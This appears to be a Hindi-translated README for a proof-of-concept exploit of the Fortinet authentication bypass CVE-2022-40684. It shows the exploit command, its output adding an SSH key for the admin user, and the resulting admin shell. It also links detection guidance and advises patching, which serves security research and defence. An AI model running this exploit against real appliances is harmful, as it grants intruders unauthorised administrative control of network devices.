
CVE-2022-40684 के लिए एक प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉयट जो Fortinet FortiOS, FortiProxy, और FortiSwitchManager को प्रभावित करता है।
CVE-2022-40684 के लिए POC जो Fortinet FortiOS, FortiProxy, और FortiSwitchManager उपकरणों को प्रभावित करता है।
भेद्यता का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
Fortinet लॉग्स में समझौता के संकेतकों का विश्लेषण करने और गहन लॉग्स को सक्षम करने के तरीके के लिए हमारे IOC ब्लॉग को देखें: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
यह POC प्रमाणीकरण बाईपास भेद्यता का दुरुपयोग करके निर्दिष्ट उपयोगकर्ता के लिए SSH कुंजी सेट करता है।
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
नवीनतम संस्करण में अपडेट करें या Fortinet PSIRT के निर्देशों का पालन करके शमन करें
यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत स्थानों को छोड़कर सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए उत्तरदायी या जिम्मेदार नहीं हैं। जिम्मेदारी से उपयोग करें।